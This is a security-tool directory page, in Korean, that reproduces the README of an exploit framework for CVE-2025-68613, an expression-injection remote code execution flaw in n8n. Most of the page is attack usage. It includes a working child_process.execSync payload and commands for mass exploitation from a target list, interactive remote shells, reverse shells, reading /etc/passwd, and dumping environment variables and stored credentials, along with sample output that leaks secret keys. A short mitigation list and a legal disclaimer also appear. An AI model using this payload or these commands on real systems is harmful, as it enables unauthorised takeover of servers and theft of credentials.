Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ 워크플로 자동화 원격 코드 실행 | Kitploit
도구/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
Remote Access Tool
Payload Development
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ 워크플로 자동화 원격 코드 실행

저장소 보기
5328개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

n8n God Mode Ultimate - CVE-2025-68613 스캐너 및 익스플로잇 프레임워크

n8n God Mode Ultimate

고급 n8n 워크플로 자동화 RCE 스캐너 및 익스플로잇 도구

Python Version License CVE CVSS Score


🎯 개요

n8n God Mode Ultimate는 n8n 워크플로 자동화 플랫폼에서 CVE-2025-68613을 탐지하고 검증하도록 설계된 종합적인 보안 테스트 프레임워크입니다. 이 치명적인 원격 코드 실행(RCE) 취약점은 워크플로 실행 컨텍스트의 표현식 주입을 통해 특정 n8n 버전에 영향을 미칩니다.

CVE-2025-68613 상세 정보

  • CVSS 점수: 10.0 (Critical)
  • 공격 벡터: 네트워크
  • 공격 복잡도: 낮음
  • 필요 권한: 낮음 (유효한 자격 증명)
  • 사용자 상호작용: 없음
  • 취약점 유형: 표현식 주입 → 원격 코드 실행

영향을 받는 버전:

  • n8n >= 0.211.0 및 < 1.120.4
  • n8n >= 1.121.0 및 < 1.121.1

패치된 버전:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ 기능

🔍 탐지 및 스캔

  • 지능형 버전 탐지 - 로그인 페이지 메타데이터에서 n8n 버전 추출
  • 배치 스캔 - 진행률 추적이 포함된 다중 스레드 동시 대상 스캔
  • 여러 스캔 모드:
    • --detect - 버전 탐지만 수행 (가장 빠르고 비침습적)
    • --safe - 익스플로잇 없이 안전한 취약점 확인
    • --poc - RCE 개념 증명 검증
    • --exploit - 전체 익스플로잇 모드

💣 익스플로잇 기능

  • 4가지 익스플로잇 기술:
    1. 스케줄 트리거 - 자동 실행 워크플로 (가장 신뢰성 높음)
    2. 웹훅 트리거 - HTTP 트리거 실행
    3. 코드 노드 - 직접 child_process 접근
    4. 표현식 주입 - 수동 표현식 실행

🎮 God Mode 기능

  • 대화형 셸 - 명령 기록이 있는 완전한 원격 셸
  • 파일 작업:
    • read <파일> - 원격 파일 읽기
    • write <파일> <내용> - 대상에 파일 쓰기
  • 환경 변수 추출 - 모든 환경 변수 덤프
  • 시스템 정보 - OS 세부 정보, 네트워크 구성, 프로세스 정보
  • 리버스 셸 - 선택적 리버스 셸 페이로드 생성
  • 명령 기록 - 내장 기록 추적

📊 고급 기능

  • 자격 증명 열거 - API를 통해 저장된 자격 증명 추출
  • 워크플로 덤프 - 메타데이터와 함께 모든 워크플로 내보내기
  • 구성 추출 - 전체 시스템 구성 덤프
  • 사용자 열거 - 모든 n8n 사용자 나열
  • 실행 로그 분석 - 워크플로 실행에서 명령 출력 파싱
  • 자동 정리 - 실행 후 선택적 워크플로 삭제

🚀 설치

사전 요구 사항

root@kitploit:~
# Python 3.8 이상
python3 --version

# pip 패키지 관리자
pip3 --version

종속성 설치

root@kitploit:~
# 저장소 복제
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# 필요한 패키지 설치
pip3 install -r requirements.txt

요구 사항

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 사용법

기본 사용법

root@kitploit:~
# 도움말 메뉴 표시
python3 n8n-godmode-ultimate.py -h

# n8n 버전 탐지 (비침습적)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# 안전한 취약점 확인
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# RCE 개념 증명
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# 전체 익스플로잇
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God Mode 작업

root@kitploit:~
# 단일 명령 실행
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# 원격 파일 읽기
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# 원격 파일 쓰기
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# 환경 변수 추출
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# 대화형 셸
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

배치 스캔

root@kitploit:~
# 파일에서 여러 대상 스캔
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# 배치 익스플로잇
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt 형식:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

대화형 셸 명령

셸 모드 진입 후 (--shell):

root@kitploit:~
n8n> whoami              # 명령 실행
n8n> read /etc/passwd    # 파일 읽기
n8n> env                 # 환경 변수 표시
n8n> info                # 시스템 정보
n8n> history             # 명령 기록
n8n> exit                # 셸 종료

🛠️ 명령줄 옵션

대상 옵션

root@kitploit:~
-u, --url URL             대상 n8n URL
-l, --list FILE           대상 URL이 포함된 파일
-t, --threads NUM         배치 스캔 스레드 수 (기본값: 10)

인증

root@kitploit:~
-e, --email EMAIL         n8n 사용자 이메일
-p, --password PASS       n8n 사용자 비밀번호

스캔 모드

root@kitploit:~
--detect                  버전 탐지만 수행 (가장 빠름)
--safe                    익스플로잇 없이 안전한 확인
--poc                     RCE 개념 증명
--exploit                 전체 익스플로잇 모드

God Mode

root@kitploit:~
--god                     God 모드 활성화
--cmd COMMAND             단일 명령 실행
--read-file PATH          원격 파일 읽기
--write-file PATH         원격 파일 쓰기
--content DATA            쓰기 작업에 사용할 내용
--dump-env                모든 환경 변수 추출
--shell                   대화형 셸 모드
--revshell HOST:PORT      리버스 셸 페이로드

익스플로잇 옵션

root@kitploit:~
--mode MODE               익스플로잇 모드: schedule|webhook|code|expression (기본값: schedule)
--timeout SEC             명령 타임아웃 (초) (기본값: 30)
--cleanup                 실행 후 워크플로 삭제
-k, --insecure           SSL 확인 비활성화
-v, --verbose            상세 출력
-q, --quiet              최소 출력

🔬 기술 세부 정보

익스플로잇 방법론

1. 스케줄 트리거 (권장)

3초마다 자동 실행되는 스케줄 트리거가 있는 워크플로를 생성합니다. 가장 신뢰성 높은 방법입니다.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. 웹훅 트리거

트리거될 때 명령을 실행하는 HTTP 웹훅 엔드포인트를 생성합니다.

3. 코드 노드

child_process 접근이 있는 코드 노드에 직접 코드를 주입합니다.

4. 표현식 주입

n8n의 표현식 평가 시스템을 통한 수동 실행입니다.

버전 탐지

로그인 페이지의 base64로 인코딩된 Sentry 구성에서 버전을 추출합니다:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

사용된 API 엔드포인트

  • /rest/login - 인증
  • /rest/workflows - 워크플로 CRUD 작업
  • /rest/credentials - 자격 증명 열거
  • /rest/executions - 실행 로그 검색
  • /rest/users - 사용자 열거
  • /rest/settings - 시스템 구성

📊 출력 예시

버전 탐지

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] 대상: https://target.example.com
[✓] n8n 버전: 1.36.1
[!] 상태: 취약 (< 1.120.4)

RCE 개념 증명

root@kitploit:~
[*] 인증 성공
[*] 익스플로잇 워크플로 생성 중...
[*] 워크플로 ID: hd6LxSY765WBThqd
[*] 명령 실행: whoami
[✓] 명령 실행 성공!
[+] 출력: root

대화형 셸

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] 환경 변수:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ 방어 조치

즉시 조치

  1. 패치된 버전으로 업그레이드 (>= 1.120.4 또는 >= 1.121.1)
  2. 기본 자격 증명 비활성화 ([email protected]:admin)
  3. 강력한 인증 구현 (MFA 권장)
  4. 네트워크 분할 - n8n 인스턴스 접근 제한
  5. 워크플로 감사 - 모든 활성 워크플로 검토
  6. 실행 로그 모니터링 - 의심스러운 활동 확인

장기적인 강화

  • 감사 로깅 활성화
  • IP 화이트리스트 구현
  • OAuth/SSO 인증 사용
  • 정기적인 보안 평가
  • n8n 업데이트 유지
  • 저장 데이터 암호화
  • 안전한 자격 증명 저장
  • 네트워크 트래픽 모니터링

⚠️ 법적 고지

승인된 보안 테스트 전용

이 도구는 교육 목적 및 승인된 보안 테스트를 위해 제공됩니다. 사용자는 모든 관련 법률 및 규정을 준수해야 합니다.

⚖️ 법적 요구 사항

다음을 반드시 준수해야 합니다:

  • ✅ 테스트 전 서면 승인 획득
  • ✅ 본인이 소유하거나 테스트 허가를 받은 시스템에서만 사용
  • ✅ 책임 있는 공개 관행 준수
  • ✅ 관련 법률 및 규정 준수
  • ✅ 방어적 보안 목적으로 사용

다음을 해서는 안 됩니다:

  • ❌ 명시적 허가 없이 시스템 테스트
  • ❌ 악의적인 목적으로 사용
  • ❌ 서비스 거부 공격 수행
  • ❌ 승인 없이 데이터 유출 또는 수정
  • ❌ 동의 없이 프로덕션 시스템에 배포

📜 책임

저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다. 컴퓨터 시스템에 대한 무단 접근은 다음 법률에 따라 불법입니다:

  • 컴퓨터 사기 및 남용법 (CFAA) - 미국
  • 컴퓨터 남용법 - 영국
  • EU 사이버 범죄 지침
  • 전 세계 유사 법률

사용 시 위험을 감수하십시오. 귀하의 행동에 대한 책임은 귀하에게 있습니다.


🤝 기여

기여를 환영합니다! 다음 지침을 따라주세요:

  1. 저장소 포크
  2. 기능 브랜치 생성 (git checkout -b feature/improvement)
  3. 변경 사항 커밋 (git commit -am 'Add new feature')
  4. 브랜치 푸시 (git push origin feature/improvement)
  5. 풀 리퀘스트 생성

행동 강령

  • 책임 있는 공개 관행 따르기
  • 보안 기능을 명확하게 문서화
  • 적절한 오류 처리 포함
  • 복잡한 로직에 주석 추가
  • 제출 전 철저히 테스트

📚 참고 자료

CVE 정보

  • CVE-2025-68613 - NVD
  • n8n 보안 권고

n8n 문서

  • n8n 공식 문서
  • n8n API 참조
  • n8n 보안 모범 사례

보안 연구

  • 표현식 주입 취약점
  • 워크플로 자동화 보안

👨‍💻 저자

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • 웹사이트: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 감사의 말

  • 멋진 워크플로 자동화 플랫폼을 만든 n8n 팀
  • n8n 커뮤니티의 보안 연구원들
  • 이 프로젝트에 영감을 준 오픈소스 보안 도구들

📞 지원

보안 문제는 책임감 있게 보고해 주세요:

  • 보안 문제: 비공개 보안 권고 열기
  • 버그 신고: GitHub Issues 사용
  • 기능 요청: GitHub Discussion 열기

⭐ 유용하다면 이 저장소에 별표를 눌러주세요!

보안 연구자들이 보안 연구자들을 위해 💻로 만들었습니다

도구 다운로드